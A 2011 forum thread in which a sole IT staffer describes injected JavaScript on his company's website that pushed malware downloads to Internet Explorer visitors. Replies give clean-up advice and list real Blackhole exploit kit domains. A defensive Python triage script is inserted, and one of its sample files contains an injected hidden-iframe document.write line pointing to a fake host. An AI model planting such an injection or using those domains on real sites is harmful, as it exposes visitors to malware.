mrmaxx Posted July 14, 2011

I found that someone had hacked into our webserver last Sunday (July 10th) and added a few lines of code to all our javascript files. Basically it was causing anyone visiting the website with Internet Explorer to start to download a file from mhjldbgmfds.com. No, that's not a made-up domain. That's the actual domain name that was trying to download something to my computer at work earlier today when I visited my company's website using Internet Explorer.
Wazoo Posted July 14, 2011

> I found that someone had hacked into our webserver last Sunday (July 10th) and added a few lines of code to all our javascript files.

I know you said that the server was hacked, but ... the 'adding a few lines to all the .js files' seems extremely out of the ordinary. More typical is the action of adding in something like an iframe bit to effect this sort of cross-site scripting. The quick check would be something simple like the file dates of the web-page creation files .... the typical hack of this sort would leave an .html or .php file with the most recent date showing. But, yes, it would depend on the craftiness of the hacker.

> ...download something to my computer at work earlier today when I visited my company's website using Internet Explorer.

Although my immediate reaction would be to get the bad code off-line and replaced with a copy of the 'backed-up good' version, the question of analysis is still valid, I suppose. Again, my first reaction .... hit it with the Firefox add-on tool "Firebug", which would allow one to pretty much see the page make-up. You didn't say whether you had anything above user-level access to this server, but even then, the majority of the codebase structure should be available. Of course, the killer question is whether the hack vector has been discovered and closed. The entrance may not have actually been a server hack; it may boil down to an exploitable application running on the web server, the more typical problem of something allowed to get into the SQL database that then gets included on the displayed pages and is allowed to progress on exploitable (or trusting) web browsers.
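The quick check Wazoo describes (look at which web files changed recently, and look inside them for an injected script or iframe that loads from a host that is not your own) can be scripted. The following is an added example written for this thread, not code posted by any participant: it walks a web root, reports which .js/.html/.php files were modified after a cut-off date, and lists any script/iframe src hosts that are not in the site's own host list. The web root, the cut-off date, the site's own hostname and the three sample files are all constructed for the demonstration; the tampered file embeds an iframe pointing at a deliberately fake host.

```python
"""Added example (not from the forum thread): defender's quick triage pass over a
web root. Lists files changed after a cut-off and flags injected script/iframe
tags whose src host is outside the site's own hosts. All inputs are constructed."""
import os
import re
import tempfile
from datetime import datetime, timezone

# A script or iframe tag with a src attribute; we capture only the host part.
TAG_RE = re.compile(
    r"<(script|iframe)\b[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s>]+)",
    re.IGNORECASE,
)


def external_hosts(text, own_hosts):
    """Return hosts referenced by script/iframe src attributes that are not in
    own_hosts (case-insensitive), in first-seen order without duplicates."""
    own = {h.lower() for h in own_hosts}
    found = []
    for _tag, host in TAG_RE.findall(text):
        host = host.lower()
        if host not in own and host not in found:
            found.append(host)
    return found


def triage(web_root, cutoff, own_hosts, exts=(".js", ".html", ".php")):
    """Walk web_root and, for each file with a matching extension, record
    whether its mtime is after cutoff and which external hosts it embeds."""
    report = []
    for dirpath, _dirs, names in os.walk(web_root):
        for name in sorted(names):
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hosts = external_hosts(fh.read(), own_hosts)
            report.append({
                "file": os.path.relpath(path, web_root).replace(os.sep, "/"),
                "modified_after_cutoff": mtime > cutoff,
                "external_hosts": hosts,
            })
    return report


def build_sample_site():
    """Create a constructed web root: two clean files with an old timestamp and
    one .js file that has an injected iframe appended (keeps a fresh mtime)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = {
        "index.html": "<html><body><script src='/js/menu.js'></script></body></html>",
        "js/menu.js": "function menu(){}\n",
        # Constructed tampered file: attacker-style appended document.write of an iframe.
        "js/app.js": ("function app(){}\n"
                      "document.write('<iframe src=\"http://example-bad.invalid/x.php\" "
                      "width=1 height=1></iframe>');\n"),
    }
    tampered = {"js/app.js"}
    old = datetime(2011, 7, 1, tzinfo=timezone.utc).timestamp()
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        if rel not in tampered:
            os.utime(path, (old, old))  # backdate the clean files
    return root


def demo():
    """Run triage over the constructed site with a constructed cut-off date."""
    root = build_sample_site()
    cutoff = datetime(2011, 7, 9, tzinfo=timezone.utc)  # assumed last-known-good date
    return triage(root, cutoff, own_hosts={"www.example.com"})


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

In practice the cut-off would be the date of the last known-good deploy or backup, and the own-host list would include any CDN the site legitimately loads from; a file that is both recently modified and references an unknown host is the one to diff against the backup first.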
Farelf Posted July 15, 2011

> ...anyone visiting the website with Internet Explorer to start to download a file from mhjldbgmfds.com. No, that's not a made-up domain. That's the actual domain name that was trying to download something to my computer at work earlier today when I visited my company's website using Internet Explorer.

Searching http://www.malwaredomainlist.com/mdl.php

mhjldbgmfds.com 46.165.192.232 blackhole exploit kit
46.165.192.232 trojan Sinowal
46.165.192.232 mhjldbgmfds.com blackhole exploit kit
mhjldbgmfds.com trojan Sinowal
aopq3ohkrb.com blackhole exploit kit
53t3ghkjksd.com blackhole exploit kit
4uiokwnbe.com blackhole exploit kit
isj23hgggjg.com blackhole exploit kit
sdi2u3i2h.com blackhole exploit kit
kdjeiuhebn.com blackhole exploit kit
hdjwuy2gvn.com blackhole exploit kit
tbcfleatfds.com blackhole exploit kit
uwjkq3b3vhv.com blackhole exploit kit
mrmaxx Posted July 15, 2011 (Author)

> Of course, the killer question is whether the hack vector has been discovered and closed. The entrance may not have actually been a server hack; it may boil down to an exploitable application running on the web server, the more typical problem of something allowed to get into the SQL database that then gets included on the displayed pages and is allowed to progress on exploitable (or trusting) web browsers.

Well, we're still not sure how the hacker got in, but the only apparent date changes were to the .js files, which added the download of an apparent known malware. I did go in and edit the .js files and removed the offending code, and it now comes up clean. I also had the webhost change the FTP settings to block access by anyone coming from any IP other than our own external IP. That may or may not solve the problem, but it's a start. There were also a number of Windows Updates that needed to be installed, so we installed them. I suppose I ought to log in about once a week and see if there are any more updates to install, or should I just say "the heck with it" and let them auto-install?

> Searching http://www.malwaredomainlist.com/mdl.php
>
> mhjldbgmfds.com 46.165.192.232 blackhole exploit kit
> 46.165.192.232 trojan Sinowal
> 46.165.192.232 mhjldbgmfds.com blackhole exploit kit
> mhjldbgmfds.com trojan Sinowal

Yeah... I pretty much figured it was malware it was trying to download. :angry: I don't like having to worry about the website as well as the internal machines... but for now, I guess I'm stuck with it. I really don't like people exposing our website visitors to malware, potentially costing us sales! :angry:
Harold Quinton Posted August 25, 2011

> I found that someone had hacked into our webserver last Sunday (July 10th) and added a few lines of code to all our javascript files. Basically it was causing anyone visiting the website with Internet Explorer to start to download a file from mhjldbgmfds.com. No, that's not a made-up domain. That's the actual domain name that was trying to download something to my computer at work earlier today when I visited my company's website using Internet Explorer.

No offense, but it seems to me like you need to hire some new people in your tech department.
mrmaxx Posted August 29, 2011 (Author)

> No offense, but it seems to me like you need to hire some new people in your tech department.

No offense taken. I would welcome more people in our IT department, since I'm the entire IT department and I know next to nothing about web programming, etc. Unfortunately, it ain't gonna happen, so I muddle along as best I can.